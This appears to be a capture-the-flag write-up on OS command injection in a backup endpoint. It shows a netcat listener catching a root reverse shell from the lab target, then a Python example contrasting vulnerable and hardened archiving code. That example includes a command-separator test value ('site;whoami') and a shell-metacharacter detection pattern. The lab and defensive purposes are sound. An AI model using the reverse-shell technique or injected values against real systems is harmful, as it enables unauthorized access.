OS Command Injection


An OS command injection vulnerability was identified at the /admin/backup API endpoint, which appears to perform some form of archiving operation in the backend.

Sending the payload:

┌──(kali㉿kali)-[~/archive/htb/labs/mentor]
└─$ nnc 9999        
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.193] 44043
whoami
root
hostname
589113857d68
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:16:00:03  
          inet addr:172.22.0.3  Bcast:172.22.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:814 errors:0 dropped:0 overruns:0 frame:0
          TX packets:833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:83843 (81.8 KiB)  TX bytes:77773 (75.9 KiB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Initial foothold established on one of the Docker containers (172.22.0.3) as the root user via OS command injection.
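The root cause of a bug like the one above is a backup handler that interpolates a request parameter into a shell command string. The following is an added example, not code from the Mentor box or this write-up: a Python sketch of such an archiving handler in its injectable form beside the hardened form. The `/srv/backups` directory, the `/var/www/app` source tree, the `name` parameter and the function names are assumptions chosen for illustration; the vulnerable variant only builds the command string rather than executing it, so the injected metacharacters can be inspected.

```python
"""
Added example (not from the original write-up): why an archiving endpoint
such as /admin/backup becomes OS-command-injectable, and how to harden it.
Paths, the `name` parameter and all function names are assumptions.
"""
import re
import subprocess
from pathlib import Path

BACKUP_ROOT = Path("/srv/backups")                 # assumed output directory
SOURCE_TREE = "/var/www/app"                        # assumed tree to archive
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")     # strict allowlist for names
SHELL_META = re.compile(r"[;&|`$()<>\n]")           # characters a shell would act on


def build_backup_command_unsafe(name: str) -> str:
    """VULNERABLE pattern: user input is pasted into a command string that
    would later be handed to a shell (shell=True / os.system). The string is
    returned, not executed, so the injected part can be inspected."""
    return f"tar -czf {BACKUP_ROOT}/{name}.tar.gz {SOURCE_TREE}"


def is_injected(command: str) -> bool:
    """Detection helper: True if the command string carries shell
    metacharacters that the intended tar invocation never needs."""
    return SHELL_META.search(command) is not None


def build_backup_argv(name: str) -> list[str]:
    """HARDENED form: validate the name against an allowlist and build an
    argv list, so no shell ever parses the user-controlled value."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("invalid backup name")
    target = BACKUP_ROOT / f"{name}.tar.gz"
    # Defence in depth: the allowlist already excludes '/', but make sure the
    # archive still lands directly inside BACKUP_ROOT.
    if target.parent != BACKUP_ROOT:
        raise ValueError("backup path escapes the backup directory")
    return ["tar", "-czf", str(target), SOURCE_TREE]


def rejects(name: str) -> bool:
    """True if the hardened builder refuses the given name."""
    try:
        build_backup_argv(name)
    except ValueError:
        return True
    return False


def run_backup(name: str) -> int:
    """Execute the hardened form: argv list, shell=False (the default), and
    no user-controlled text reaches any shell. Returns tar's exit status."""
    result = subprocess.run(build_backup_argv(name), capture_output=True)
    return result.returncode


if __name__ == "__main__":
    # Constructed inputs: a normal name and one carrying a command separator.
    for candidate in ("site", "site;whoami"):
        cmd = build_backup_command_unsafe(candidate)
        print(f"unsafe command : {cmd!r}  injected={is_injected(cmd)}")
        print(f"hardened builder rejects {candidate!r}: {rejects(candidate)}")
```

The allowlist is the control that matters: a denylist of metacharacters is easy to get wrong across shells, whereas an argv list plus a tight character class leaves nothing for a shell to interpret. In a detection context, the same `SHELL_META` check applied to the request parameter in web-server or application logs flags attempts against such an endpoint.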